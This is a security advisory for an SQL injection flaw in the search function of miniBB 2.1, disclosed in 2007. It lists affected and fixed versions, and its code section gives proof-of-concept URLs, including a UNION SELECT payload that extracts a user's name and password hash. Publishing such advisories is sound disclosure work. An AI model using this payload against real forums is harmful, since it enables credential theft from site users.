| Title |
miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability |
| Published |
2007-10-30-12:00AM |
| Updated |
2007-10-30-03:06PM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
irk4z discovered this vulnerability. |
| Vulnerable |
MiniBB MiniBB 2.1 Apache Software Foundation Apache 1.3.24 Apache Software Foundation Apache 1.3.24 Apache Software Foundation Apache 1.3.23 Apache Software Foundation Apache 1.3.23 Apache Software Foundation Apache 1.3.22 Apache Software Foundation Apache 1.3.22 Apache Software Foundation Apache 1.3.20 Apache Software Foundation Apache 1.3.20 Apache Software Foundation Apache 1.3.19 Apache Software Foundation Apache 1.3.19
|
| Not Vulnerable |
MiniBB MiniBB 2.1a -Apache Software Foundation Apache 1.3.24 -Apache Software Foundation Apache 1.3.24 -Apache Software Foundation Apache 1.3.23 -Apache Software Foundation Apache 1.3.23 -Apache Software Foundation Apache 1.3.22 -Apache Software Foundation Apache 1.3.22 -Apache Software Foundation Apache 1.3.20 -Apache Software Foundation Apache 1.3.20 -Apache Software Foundation Apache 1.3.19 -Apache Software Foundation Apache 1.3.19
|
| Code |
Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:http://www.example.com/index.php?action=search&where=3&searchGo=1&table=[SQL] http://www.example.com/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username,0x20,user_password))/**/FROM/**/minibbtable_users/**/WHERE/**/user_id=1/* |
| TXT |
 |